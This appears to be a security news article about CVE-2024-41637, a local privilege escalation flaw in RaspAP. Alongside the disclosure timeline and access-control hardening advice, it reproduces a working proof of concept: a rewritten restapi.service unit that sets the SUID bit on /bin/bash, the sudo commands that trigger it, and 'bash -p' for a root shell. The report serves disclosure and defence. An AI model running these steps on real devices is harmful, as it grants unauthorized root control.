A critical local privilege escalation vulnerability has been discovered in RaspAP, an open-source project designed to transform Raspberry Pi devices into wireless access points or routers.
Identified as CVE-2024-41637, this flaw has been rated with a severity score of 9.9 (Critical) on the CVSS scale.
The vulnerability affected RaspAP versions before 3.1.5 and was disclosed publicly on July 27, 2024, after multiple attempts to contact the RaspAP security team went unanswered.
CVE-2024-41637 – RaspAP Local Privilege Escalation
RaspAP is widely used in educational settings, IoT applications, and by homelab enthusiasts for its ease of configuring and managing wireless networks through a web interface.
According to the 0xZon report, the vulnerability stems from improper access controls, where the www-data user can write to the restapi.service file and execute critical commands with sudo privileges without a password.
This combination allows attackers to escalate their privileges from www-data to root, potentially leading to severe security breaches.
Join our free webinar to learn about combating slow DDoS attacks, a major threat today.
Exploitation Proof of Concept
Security researcher Aaron Haymore, who discovered the flaw, has provided a proof of concept (PoC) demonstrating how the vulnerability can be exploited.
The steps involve modifying the restapi.service file to execute arbitrary code with root privileges. Here’s a summary of the process:
- Edit the Service Configuration: As the www-data user, modify the restapi.service file located at /lib/systemd/system/restapi.service with the following configuration:
[Unit]
Description=Set SUID bit on /bin/bash
After=network.target
[Service]
Type=simple
ExecStart=/bin/bash -c 'echo "Service started. Use systemctl to stop the service to set the SUID bit on /bin/bash."'
ExecStop=/bin/bash -c 'chmod u+s /bin/bash'
Restart=always
RestartSec=1
[Install]
WantedBy=multi-user.target
- Reboot the Machine: Run the command sudo /sbin/reboot to reboot the machine and reload the daemon.
- Start the Modified Service: After rebooting, start the modified service using sudo /bin/systemctl start restapi.service.
- Stop the Service: To set the SUID bit, stop the service with sudo /bin/systemctl stop restapi.service.
- Gain Root Access: Execute /bin/bash -p to gain a root shell.
These steps illustrate how an attacker can exploit the vulnerability to gain root access, underscoring the critical nature of this security flaw.
Timeline and Response
The vulnerability was discovered and reported to the RaspAP security team on July 16, 2024. Despite multiple follow-up emails on July 18, 23, and 26, no response was received.
Consequently, the vulnerability was publicly disclosed on July 27, 2024. The RaspAP team’s lack of response highlights the importance of timely communication and addressing security issues promptly.
This vulnerability in RaspAP highlights the critical importance of correctly configuring access controls and user privileges within a system.
Allowing a low-privilege user like www-data to modify service files and use sudo without proper restrictions can lead to severe security breaches, including privilege escalation and arbitrary code execution.
To prevent such vulnerabilities, it is essential to adhere to the following best practices for access control:
- Implement the Principle of Least Privilege: Ensure that users have only the minimal level of access necessary to perform their duties. Restrict write permissions to service files to only those who need them.
- Audit and Restrict sudo Access: Regularly review sudoers configurations to ensure only trusted users can execute commands with elevated privileges. Avoid broad NOPASSWD configurations that can be exploited.
- Secure Service Configurations: Ensure critical service configurations and scripts are protected from unauthorized modifications. Use appropriate file permissions and ownership settings.
- Monitoring and Logging: Implement comprehensive logging and monitoring to detect and alert unauthorized changes or suspicious activities. Regularly review logs to catch potential exploitation attempts early.
By focusing on correct access controls and ensuring that permissions are appropriately configured, organizations can significantly reduce the risk of such vulnerabilities and maintain a more secure environment.
This case underscores the importance of diligently managing user privileges and access to critical system components.
Protect Your Business Emails From Spoofing, Phishing & BEC with AI-Powered Security | Free Demo